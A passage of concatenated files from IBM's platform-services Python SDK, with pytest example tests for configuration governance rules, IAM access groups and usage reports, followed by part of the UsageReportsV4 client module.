configuration_governance_service = ConfigurationGovernanceV1.new_instance(
)
# end-common
assert configuration_governance_service is not None
# Load the configuration
global config, account_id, service_name, enterprise_scope_id, subacct_scope_id
config = read_external_sources(
ConfigurationGovernanceV1.DEFAULT_SERVICE_NAME)
account_id = config['ACCOUNT_ID']
service_name = config['EXAMPLE_SERVICE_NAME']
enterprise_scope_id = config['ENTERPRISE_SCOPE_ID']
subacct_scope_id = config['SUBACCT_SCOPE_ID']
cls.clean_rules()
print('Setup complete.')
needscredentials = pytest.mark.skipif(
not os.path.exists(config_file),
reason="External configuration not available, skipping...")
@needscredentials
def test_create_rules_example(self):
"""
create_rules request example
"""
try:
print('\ncreate_rules() result:')
# begin-create_rules
target_resource_model = {
'service_name': service_name,
'resource_kind': 'service'
}
rule_required_config_model = {
'description': 'Public access check',
'property': 'public_access_enabled',
'operator': 'is_true'
}
enforcement_action_model = {'action': 'disallow'}
rule_request_model = {
'account_id': account_id,
'name': 'Disable public access',
'description':
'Ensure that public access to account resources is disabled.',
'target': {
'service_name': service_name,
'resource_kind': 'service'
},
'required_config': {
'description':
'Public access check',
'and': [{
'property': 'public_access_enabled',
'operator': 'is_false'
}]
},
'enforcement_actions': [enforcement_action_model],
'labels': [test_label]
}
create_rule_request_model = {
'request_id': '3cebc877-58e7-44a5-a292-32114fa73558',
'rule': {
'account_id':
account_id,
'name':
'Disable public access',
'description':
'Ensure that public access to account resources is disabled.',
'labels': [test_label],
'target': {
'service_name': service_name,
'resource_kind': 'service'
},
'required_config': {
'description':
'Public access check',
'and': [{
'property': 'public_access_enabled',
'operator': 'is_false'
}]
},
'enforcement_actions': [{
'action': 'disallow'
}, {
'action': 'audit_log'
}]
}
}
detailed_response = configuration_governance_service.create_rules(
rules=[create_rule_request_model])
create_rules_response = detailed_response.get_result()
if detailed_response.status_code == 207:
for responseEntry in create_rules_response['rules']:
if responseEntry['status_code'] > 299:
raise ApiException(
code=responseEntry['errors'][0]['code'],
message=responseEntry['errors'][0]['message'])
print(json.dumps(create_rules_response, indent=2))
# end-create_rules
global rule_id_link
rule_id_link = create_rules_response['rules'][0]['rule']['rule_id']
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_create_attachments_example(self):
"""
create_attachments request example
"""
try:
print('\ncreate_attachments() result:')
# begin-create_attachments
excluded_scope_model = {
'note': 'Development account',
'scope_id': subacct_scope_id,
'scope_type': 'enterprise.account'
}
attachment_request_model = {
'account_id': account_id,
'included_scope': {
'note': 'My enterprise',
'scope_id': enterprise_scope_id,
'scope_type': 'enterprise'
},
'excluded_scopes': [excluded_scope_model]
}
create_attachments_response = configuration_governance_service.create_attachments(
rule_id=rule_id_link,
attachments=[attachment_request_model]).get_result()
print(json.dumps(create_attachments_response, indent=2))
# end-create_attachments
global attachment_id_link
attachment_id_link = create_attachments_response['attachments'][0][
'attachment_id']
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_attachment_example(self):
"""
get_attachment request example
"""
try:
print('\nget_attachment() result:')
# begin-get_attachment
attachment = configuration_governance_service.get_attachment(
rule_id=rule_id_link,
attachment_id=attachment_id_link).get_result()
print(json.dumps(attachment, indent=2))
# end-get_attachment
global attachment_etag_link
attachment_etag_link = configuration_governance_service.get_attachment(
rule_id=rule_id_link,
attachment_id=attachment_id_link).get_headers().get('Etag')
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_rule_example(self):
"""
get_rule request example
"""
try:
print('\nget_rule() result:')
# begin-get_rule
rule = configuration_governance_service.get_rule(
rule_id=rule_id_link).get_result()
print(json.dumps(rule, indent=2))
# end-get_rule
global rule_etag_link
rule_etag_link = configuration_governance_service.get_rule(
rule_id=rule_id_link).get_headers().get('etag')
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_list_rules_example(self):
"""
list_rules request example
"""
try:
print('\nlist_rules() result:')
# begin-list_rules
rule_list = configuration_governance_service.list_rules(
account_id=account_id).get_result()
print(json.dumps(rule_list, indent=2))
# end-list_rules
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_update_rule_example(self):
"""
update_rule request example
"""
try:
print('\nupdate_rule() result:')
# begin-update_rule
rule_target_attribute_model = {
'name': 'testString',
'operator': 'string_equals'
}
target_resource_model = {
'service_name': service_name,
'resource_kind': 'service',
'additional_target_attributes': [rule_target_attribute_model]
}
rule_required_config_model = {
'property': 'public_access_enabled',
'operator': 'is_false'
}
enforcement_action_model = {'action': 'audit_log'}
rule = configuration_governance_service.update_rule(
rule_id=rule_id_link,
if_match=rule_etag_link,
name='Disable public access',
description=
'Ensure that public access to account resources is disabled.',
target={
'service_name': service_name,
'resource_kind': 'service',
'additional_target_attributes': []
},
required_config={
'property': 'public_access_enabled',
'operator': 'is_false'
},
enforcement_actions=[enforcement_action_model],
account_id=account_id,
rule_type='user_defined',
labels=['testString']).get_result()
print(json.dumps(rule, indent=2))
# end-update_rule
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_list_attachments_example(self):
"""
list_attachments request example
"""
try:
print('\nlist_attachments() result:')
# begin-list_attachments
attachment_list = configuration_governance_service.list_attachments(
rule_id=rule_id_link).get_result()
print(json.dumps(attachment_list, indent=2))
# end-list_attachments
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_update_attachment_example(self):
"""
update_attachment request example
"""
try:
print('\nupdate_attachment() result:')
# begin-update_attachment
excluded_scope_model = {
'note': 'Development account',
'scope_id': subacct_scope_id,
'scope_type': 'enterprise.account'
}
attachment = configuration_governance_service.update_attachment(
rule_id=rule_id_link,
attachment_id=attachment_id_link,
if_match=attachment_etag_link,
account_id=account_id,
included_scope={
'note': 'My enterprise',
'scope_id': enterprise_scope_id,
'scope_type': 'enterprise'
},
excluded_scopes=[excluded_scope_model]).get_result()
print(json.dumps(attachment, indent=2))
# end-update_attachment
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_delete_attachment_example(self):
"""
delete_attachment request example
"""
try:
# begin-delete_attachment
response = configuration_governance_service.delete_attachment(
rule_id=rule_id_link,
attachment_id=attachment_id_link).get_result()
# end-delete_attachment
print('\ndelete_attachment() response status code: ',
response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_delete_rule_example(self):
"""
delete_rule request example
"""
try:
# begin-delete_rule
response = configuration_governance_service.delete_rule(
rule_id=rule_id_link).get_result()
# end-delete_rule
print('\ndelete_rule() response status code: ',
response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
@classmethod
def clean_rules(cls):
"""
Clean up rules from prior test runs
"""
try:
rule_list = configuration_governance_service.list_rules(
account_id=account_id,
labels=test_label,
).get_result()
for rule in rule_list['rules']:
rule_id = rule['rule_id']
print(f'deleting rule {rule_id}')
configuration_governance_service.delete_rule(rule_id)
except ApiException as e:
print(str(e))
# endregion
##############################################################################
# End of Examples for Service: ConfigurationGovernanceV1
##############################################################################
```
#### File: platform-services-python-sdk/examples/test_iam_access_groups_v2_examples.py
```python
import os
import json
import pytest
from ibm_cloud_sdk_core import ApiException, read_external_sources
from ibm_platform_services.iam_access_groups_v2 import *
#
# This file provides an example of how to use the IAM Access Groups service.
#
# The following configuration properties are assumed to be defined:
#
# IAM_ACCESS_GROUPS_URL=<service url>
# IAM_ACCESS_GROUPS_AUTHTYPE=iam
# IAM_ACCESS_GROUPS_APIKEY=<your iam apikey>
# IAM_ACCESS_GROUPS_AUTH_URL=<IAM token service URL - omit this if using the production environment>
# IAM_ACCESS_GROUPS_TEST_ACCOUNT_ID=<id of an account used for testing>
#
# These configuration properties can be exported as environment variables, or stored
# in a configuration file and then:
# export IBM_CREDENTIALS_FILE=<name of configuration file>
#
config_file = 'iam_access_groups.env'
iam_access_groups_service = None
config = None
test_account_id = None
test_group_etag = None
test_group_id = None
test_claim_rule_id = None
test_claim_rule_etag = None
##############################################################################
# Start of Examples for Service: IamAccessGroupsV2
##############################################################################
# region
class TestIamAccessGroupsV2Examples():
"""
Example Test Class for IamAccessGroupsV2
"""
@classmethod
def setup_class(cls):
global iam_access_groups_service
if os.path.exists(config_file):
os.environ['IBM_CREDENTIALS_FILE'] = config_file
# begin-common
iam_access_groups_service = IamAccessGroupsV2.new_instance()
# end-common
assert iam_access_groups_service is not None
# Load the configuration
global config, test_account_id
config = read_external_sources(
IamAccessGroupsV2.DEFAULT_SERVICE_NAME)
test_account_id = config['TEST_ACCOUNT_ID']
print('Setup complete.')
needscredentials = pytest.mark.skipif(
not os.path.exists(config_file), reason="External configuration not available, skipping..."
)
@needscredentials
def test_create_access_group_example(self):
"""
create_access_group request example
"""
try:
print('\ncreate_access_group() result:')
# begin-create_access_group
group = iam_access_groups_service.create_access_group(
account_id=test_account_id,
name='Managers',
description='Group for managers'
).get_result()
print(json.dumps(group, indent=2))
# end-create_access_group
global test_group_id
test_group_id = group['id']
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_access_group_example(self):
"""
get_access_group request example
"""
try:
print('\nget_access_group() result:')
# begin-get_access_group
response = iam_access_groups_service.get_access_group(
access_group_id=test_group_id
)
group = response.get_result()
print(json.dumps(group, indent=2))
# end-get_access_group
global test_group_etag
test_group_etag = response.get_headers().get('Etag')
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_update_access_group_example(self):
"""
update_access_group request example
"""
try:
print('\nupdate_access_group() result:')
# begin-update_access_group
group = iam_access_groups_service.update_access_group(
access_group_id=test_group_id,
if_match=test_group_etag,
name='Awesome Managers',
description='Group for awesome managers'
).get_result()
print(json.dumps(group, indent=2))
# end-update_access_group
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_list_access_groups_example(self):
"""
list_access_groups request example
"""
try:
print('\nlist_access_groups() result:')
# begin-list_access_groups
groups_list = iam_access_groups_service.list_access_groups(
account_id=test_account_id
).get_result()
print(json.dumps(groups_list, indent=2))
# end-list_access_groups
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_add_members_to_access_group_example(self):
"""
add_members_to_access_group request example
"""
try:
print('\nadd_members_to_access_group() result:')
# begin-add_members_to_access_group
member1 = AddGroupMembersRequestMembersItem(
iam_id='IBMid-user1', type='user')
member2 = AddGroupMembersRequestMembersItem(
iam_id='iam-ServiceId-123', type='service')
members = [member1, member2]
add_group_members_response = iam_access_groups_service.add_members_to_access_group(
access_group_id=test_group_id,
members=members
).get_result()
print(json.dumps(add_group_members_response, indent=2))
# end-add_members_to_access_group
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_is_member_of_access_group_example(self):
"""
is_member_of_access_group request example
"""
try:
# begin-is_member_of_access_group
response = iam_access_groups_service.is_member_of_access_group(
access_group_id=test_group_id,
iam_id='IBMid-user1'
)
# end-is_member_of_access_group
print('\nis_member_of_access_group() response status code: ', response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_list_access_group_members_example(self):
"""
list_access_group_members request example
"""
try:
print('\nlist_access_group_members() result:')
# begin-list_access_group_members
group_members_list = iam_access_groups_service.list_access_group_members(
access_group_id=test_group_id
).get_result()
print(json.dumps(group_members_list, indent=2))
# end-list_access_group_members
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_remove_member_from_access_group_example(self):
"""
remove_member_from_access_group request example
"""
try:
# begin-remove_member_from_access_group
response = iam_access_groups_service.remove_member_from_access_group(
access_group_id=test_group_id,
iam_id='IBMid-user1'
)
# end-remove_member_from_access_group
print('\nremove_member_from_access_group() response status code:', response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_remove_members_from_access_group_example(self):
"""
remove_members_from_access_group request example
"""
try:
print('\nremove_members_from_access_group() result:')
# begin-remove_members_from_access_group
delete_group_bulk_members_response = iam_access_groups_service.remove_members_from_access_group(
access_group_id=test_group_id,
members=['iam-ServiceId-123']
).get_result()
print(json.dumps(delete_group_bulk_members_response, indent=2))
# end-remove_members_from_access_group
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_add_member_to_multiple_access_groups_example(self):
"""
add_member_to_multiple_access_groups request example
"""
try:
print('\nadd_member_to_multiple_access_groups() result:')
# begin-add_member_to_multiple_access_groups
add_membership_multiple_groups_response = iam_access_groups_service.add_member_to_multiple_access_groups(
account_id=test_account_id,
iam_id='IBMid-user1',
type='user',
groups=[test_group_id]
).get_result()
print(json.dumps(add_membership_multiple_groups_response, indent=2))
# end-add_member_to_multiple_access_groups
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_remove_member_from_all_access_groups_example(self):
"""
remove_member_from_all_access_groups request example
"""
try:
print('\nremove_member_from_all_access_groups() result:')
# begin-remove_member_from_all_access_groups
delete_from_all_groups_response = iam_access_groups_service.remove_member_from_all_access_groups(
account_id=test_account_id,
iam_id='IBMid-user1'
).get_result()
print(json.dumps(delete_from_all_groups_response, indent=2))
# end-remove_member_from_all_access_groups
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_add_access_group_rule_example(self):
"""
add_access_group_rule request example
"""
try:
print('\nadd_access_group_rule() result:')
# begin-add_access_group_rule
rule_conditions_model = {
'claim': 'isManager',
'operator': 'EQUALS',
'value': 'true'
}
rule = iam_access_groups_service.add_access_group_rule(
access_group_id=test_group_id,
name='Manager group rule',
expiration=12,
realm_name='https://idp.example.org/SAML2"',
conditions=[rule_conditions_model]
).get_result()
print(json.dumps(rule, indent=2))
# end-add_access_group_rule
global test_claim_rule_id
test_claim_rule_id = rule['id']
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_access_group_rule_example(self):
"""
get_access_group_rule request example
"""
try:
print('\nget_access_group_rule() result:')
# begin-get_access_group_rule
response = iam_access_groups_service.get_access_group_rule(
access_group_id=test_group_id,
rule_id=test_claim_rule_id
)
rule = response.get_result()
print(json.dumps(rule, indent=2))
# end-get_access_group_rule
global test_claim_rule_etag
test_claim_rule_etag = response.get_headers().get('Etag')
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_replace_access_group_rule_example(self):
"""
replace_access_group_rule request example
"""
try:
print('\nreplace_access_group_rule() result:')
# begin-replace_access_group_rule
rule_conditions_model = {
'claim': 'isManager',
'operator': 'EQUALS',
'value': 'true'
}
rule = iam_access_groups_service.replace_access_group_rule(
access_group_id=test_group_id,
rule_id=test_claim_rule_id,
if_match=test_claim_rule_etag,
name='Manager group rule',
expiration=24,
realm_name='https://idp.example.org/SAML2',
conditions=[rule_conditions_model]
).get_result()
print(json.dumps(rule, indent=2))
# end-replace_access_group_rule
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_list_access_group_rules_example(self):
"""
list_access_group_rules request example
"""
try:
print('\nlist_access_group_rules() result:')
# begin-list_access_group_rules
rules_list = iam_access_groups_service.list_access_group_rules(
access_group_id=test_group_id
).get_result()
print(json.dumps(rules_list, indent=2))
# end-list_access_group_rules
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_remove_access_group_rule_example(self):
"""
remove_access_group_rule request example
"""
try:
# begin-remove_access_group_rule
response = iam_access_groups_service.remove_access_group_rule(
access_group_id=test_group_id,
rule_id=test_claim_rule_id
)
# end-remove_access_group_rule
print('\nremove_access_group_rule() response status code:', response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_account_settings_example(self):
"""
get_account_settings request example
"""
try:
print('\nget_account_settings() result:')
# begin-get_account_settings
account_settings = iam_access_groups_service.get_account_settings(
account_id=test_account_id
).get_result()
print(json.dumps(account_settings, indent=2))
# end-get_account_settings
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_update_account_settings_example(self):
"""
update_account_settings request example
"""
try:
print('\nupdate_account_settings() result:')
# begin-update_account_settings
account_settings = iam_access_groups_service.update_account_settings(
account_id=test_account_id,
public_access_enabled=True
).get_result()
print(json.dumps(account_settings, indent=2))
# end-update_account_settings
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_delete_access_group_example(self):
"""
delete_access_group request example
"""
try:
# begin-delete_access_group
response = iam_access_groups_service.delete_access_group(
access_group_id=test_group_id
)
# end-delete_access_group
            print('\ndelete_access_group() response status code:', response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
# endregion
##############################################################################
# End of Examples for Service: IamAccessGroupsV2
##############################################################################
```
#### File: platform-services-python-sdk/examples/test_usage_reports_v4_examples.py
```python
import os
import json
import pytest
from ibm_cloud_sdk_core import ApiException, read_external_sources
from ibm_platform_services.usage_reports_v4 import *
#
# This file provides an example of how to use the Usage Reports service.
#
# The following configuration properties are assumed to be defined:
# USAGE_REPORTS_URL=<service url>
# USAGE_REPORTS_AUTHTYPE=iam
# USAGE_REPORTS_APIKEY=<IAM api key of user with authority to create rules>
# USAGE_REPORTS_AUTH_URL=<IAM token service URL - omit this if using the production environment>
# USAGE_REPORTS_ACCOUNT_ID=<the id of the account whose usage info will be retrieved>
# USAGE_REPORTS_RESOURCE_GROUP_ID=<the id of the resource group whose usage info will be retrieved>
# USAGE_REPORTS_ORG_ID=<the id of the organization whose usage info will be retrieved>
# USAGE_REPORTS_BILLING_MONTH=<the billing month (yyyy-mm) for which usage info will be retrieved>
#
# These configuration properties can be exported as environment variables, or stored
# in a configuration file and then:
# export IBM_CREDENTIALS_FILE=<name of configuration file>
#
config_file = 'usage_reports.env'
usage_reports_service = None
config = None
account_id = None
resource_group_id = None
org_id = None
billing_month = None
##############################################################################
# Start of Examples for Service: UsageReportsV4
##############################################################################
# region
class TestUsageReportsV4Examples():
"""
Example Test Class for UsageReportsV4
"""
@classmethod
def setup_class(cls):
global usage_reports_service
if os.path.exists(config_file):
os.environ['IBM_CREDENTIALS_FILE'] = config_file
# begin-common
usage_reports_service = UsageReportsV4.new_instance(
)
# end-common
assert usage_reports_service is not None
# Load the configuration
global config
config = read_external_sources(UsageReportsV4.DEFAULT_SERVICE_NAME)
# Retrieve and verify some additional test-related config properties.
global account_id
account_id = config.get("ACCOUNT_ID")
global resource_group_id
resource_group_id = config.get("RESOURCE_GROUP_ID")
global org_id
org_id = config.get("ORG_ID")
global billing_month
billing_month = config.get("BILLING_MONTH")
assert account_id is not None
assert resource_group_id is not None
assert org_id is not None
assert billing_month is not None
print('Setup complete.')
needscredentials = pytest.mark.skipif(
not os.path.exists(config_file), reason="External configuration not available, skipping..."
)
@needscredentials
def test_get_account_summary_example(self):
"""
get_account_summary request example
"""
try:
global account_id, billing_month
print('\nget_account_summary() result:')
# begin-get_account_summary
account_summary = usage_reports_service.get_account_summary(
account_id=account_id,
billingmonth=billing_month
).get_result()
print(json.dumps(account_summary, indent=2))
# end-get_account_summary
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_account_usage_example(self):
"""
get_account_usage request example
"""
try:
global account_id, billing_month
print('\nget_account_usage() result:')
# begin-get_account_usage
account_usage = usage_reports_service.get_account_usage(
account_id=account_id,
billingmonth=billing_month
).get_result()
print(json.dumps(account_usage, indent=2))
# end-get_account_usage
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_resource_group_usage_example(self):
"""
get_resource_group_usage request example
"""
try:
global account_id, resource_group_id, billing_month
print('\nget_resource_group_usage() result:')
# begin-get_resource_group_usage
resource_group_usage = usage_reports_service.get_resource_group_usage(
account_id=account_id,
resource_group_id=resource_group_id,
billingmonth=billing_month
).get_result()
print(json.dumps(resource_group_usage, indent=2))
# end-get_resource_group_usage
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_org_usage_example(self):
"""
get_org_usage request example
"""
try:
global account_id, org_id, billing_month
print('\nget_org_usage() result:')
# begin-get_org_usage
org_usage = usage_reports_service.get_org_usage(
account_id=account_id,
organization_id=org_id,
billingmonth=billing_month
).get_result()
print(json.dumps(org_usage, indent=2))
# end-get_org_usage
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_resource_usage_account_example(self):
"""
get_resource_usage_account request example
"""
try:
global account_id, billing_month
print('\nget_resource_usage_account() result:')
# begin-get_resource_usage_account
instances_usage = usage_reports_service.get_resource_usage_account(
account_id=account_id,
billingmonth=billing_month
).get_result()
print(json.dumps(instances_usage, indent=2))
# end-get_resource_usage_account
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_resource_usage_resource_group_example(self):
"""
get_resource_usage_resource_group request example
"""
try:
global account_id, resource_group_id, billing_month
print('\nget_resource_usage_resource_group() result:')
# begin-get_resource_usage_resource_group
instances_usage = usage_reports_service.get_resource_usage_resource_group(
account_id=account_id,
resource_group_id=resource_group_id,
billingmonth=billing_month
).get_result()
print(json.dumps(instances_usage, indent=2))
# end-get_resource_usage_resource_group
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_resource_usage_org_example(self):
"""
get_resource_usage_org request example
"""
try:
global account_id, org_id, billing_month
print('\nget_resource_usage_org() result:')
# begin-get_resource_usage_org
instances_usage = usage_reports_service.get_resource_usage_org(
account_id=account_id,
organization_id=org_id,
billingmonth=billing_month
).get_result()
print(json.dumps(instances_usage, indent=2))
# end-get_resource_usage_org
except ApiException as e:
pytest.fail(str(e))
# endregion
##############################################################################
# End of Examples for Service: UsageReportsV4
##############################################################################
```
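For reference, the examples above depend on external configuration loaded at runtime. The snippet below is a minimal sketch of constructing the client directly with an `IAMAuthenticator` instead; the API key, account ID, and month are hypothetical placeholders, not values from the source.

```python
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from ibm_platform_services import UsageReportsV4

# Hypothetical credentials: substitute a real IAM API key and account ID.
authenticator = IAMAuthenticator('<your-iam-apikey>')
service = UsageReportsV4(authenticator=authenticator)
service.set_service_url(UsageReportsV4.DEFAULT_SERVICE_URL)

# Fetch the account summary for a given billing month (format yyyy-mm).
account_summary = service.get_account_summary(
    account_id='<account-id>',
    billingmonth='2021-01',
).get_result()
print(account_summary)
```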
#### File: platform-services-python-sdk/ibm_platform_services/usage_reports_v4.py
```python
from datetime import datetime
from typing import Dict, List
import json
from ibm_cloud_sdk_core import BaseService, DetailedResponse
from ibm_cloud_sdk_core.authenticators.authenticator import Authenticator
from ibm_cloud_sdk_core.get_authenticator import get_authenticator_from_environment
from ibm_cloud_sdk_core.utils import datetime_to_string, string_to_datetime
from .common import get_sdk_headers
##############################################################################
# Service
##############################################################################
class UsageReportsV4(BaseService):
"""The Usage Reports V4 service."""
DEFAULT_SERVICE_URL = 'https://billing.cloud.ibm.com'
DEFAULT_SERVICE_NAME = 'usage_reports'
@classmethod
def new_instance(cls,
service_name: str = DEFAULT_SERVICE_NAME,
) -> 'UsageReportsV4':
"""
Return a new client for the Usage Reports service using the specified
parameters and external configuration.
"""
authenticator = get_authenticator_from_environment(service_name)
service = cls(
authenticator
)
service.configure_service(service_name)
return service
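    # Usage sketch (an assumption, not from the source): `new_instance` pulls its
    # authenticator from external configuration, e.g. environment variables or a
    # credentials file pointed to by IBM_CREDENTIALS_FILE, so a typical call is:
    #   service = UsageReportsV4.new_instance()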
def __init__(self,
authenticator: Authenticator = None,
) -> None:
"""
Construct a new client for the Usage Reports service.
:param Authenticator authenticator: The authenticator specifies the authentication mechanism.
Get up to date information from https://github.com/IBM/python-sdk-core/blob/master/README.md
about initializing the authenticator of your choice.
"""
BaseService.__init__(self,
service_url=self.DEFAULT_SERVICE_URL,
authenticator=authenticator)
#########################
# Account operations
#########################
def get_account_summary(self,
account_id: str,
billingmonth: str,
**kwargs
) -> DetailedResponse:
"""
Get account summary.
Returns the summary for the account for a given month. Account billing managers
are authorized to access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `AccountSummary` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_account_summary')
headers.update(sdk_headers)
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/summary/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers)
response = self.send(request, **kwargs)
return response
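    # Usage sketch (placeholder values, not from the source):
    #   summary = service.get_account_summary(
    #       account_id='<account-id>', billingmonth='2021-01'
    #   ).get_result()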
def get_account_usage(self,
account_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
**kwargs
) -> DetailedResponse:
"""
Get account usage.
Usage for all the resources and plans in an account for a given month. Account
billing managers are authorized to access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `AccountUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_account_usage')
headers.update(sdk_headers)
params = {
'_names': names
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
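    # Usage sketch showing the optional parameters (placeholder values):
    #   usage = service.get_account_usage(
    #       account_id='<account-id>', billingmonth='2021-01',
    #       names=True,            # include display names in the report
    #       accept_language='fr',  # prefer French names where available
    #   ).get_result()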
#########################
# Resource operations
#########################
def get_resource_group_usage(self,
account_id: str,
resource_group_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
**kwargs
) -> DetailedResponse:
"""
Get resource group usage.
Usage for all the resources and plans in a resource group in a given month.
Account billing managers or resource group billing managers are authorized to
access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str resource_group_id: Resource group for which the usage report is
requested.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `ResourceGroupUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if resource_group_id is None:
raise ValueError('resource_group_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_resource_group_usage')
headers.update(sdk_headers)
params = {
'_names': names
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'resource_group_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, resource_group_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
url = '/v4/accounts/{account_id}/resource_groups/{resource_group_id}/usage/{billingmonth}'.format(**path_param_dict)
request = self.prepare_request(method='GET',
url=url,
headers=headers,
params=params)
response = self.send(request, **kwargs)
return response
def get_resource_usage_account(self,
account_id: str,
billingmonth: str,
*,
names: bool = None,
accept_language: str = None,
limit: int = None,
start: str = None,
resource_group_id: str = None,
organization_id: str = None,
resource_instance_id: str = None,
resource_id: str = None,
plan_id: str = None,
region: str = None,
**kwargs
) -> DetailedResponse:
"""
Get resource instance usage in an account.
Query for resource instance usage in an account. Filter the results with query
        parameters. The account billing administrator is authorized to access this report.
:param str account_id: Account ID for which the usage report is requested.
:param str billingmonth: The billing month for which the usage report is
requested. Format is yyyy-mm.
:param bool names: (optional) Include the name of every resource, plan,
resource instance, organization, and resource group.
:param str accept_language: (optional) Prioritize the names returned in the
order of the specified languages. Language will default to English.
:param int limit: (optional) Number of usage records returned. The default
value is 10. Maximum value is 20.
:param str start: (optional) The offset from which the records must be
fetched. Offset information is included in the response.
:param str resource_group_id: (optional) Filter by resource group.
:param str organization_id: (optional) Filter by organization_id.
        :param str resource_instance_id: (optional) Filter by resource_instance_id.
:param str resource_id: (optional) Filter by resource_id.
:param str plan_id: (optional) Filter by plan_id.
:param str region: (optional) Region in which the resource instance is
provisioned.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `InstancesUsage` object
"""
if account_id is None:
raise ValueError('account_id must be provided')
if billingmonth is None:
raise ValueError('billingmonth must be provided')
headers = {
'Accept-Language': accept_language
}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V4',
operation_id='get_resource_usage_account')
headers.update(sdk_headers)
params = {
'_names': names,
'_limit': limit,
'_start': start,
'resource_group_id': resource_group_id,
'organization_id': organization_id,
'resource_instance_id': resource_instance_id,
'resource_id': resource_id,
'plan_id': plan_id,
'region': region
}
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
headers['Accept'] = 'application/json'
path_param_keys = ['account_id', 'billingmonth']
path_param_values = self.encode_path_vars(account_id, billingmonth)
path_param_dict = dict(zip(path_param_keys, path_param_values))
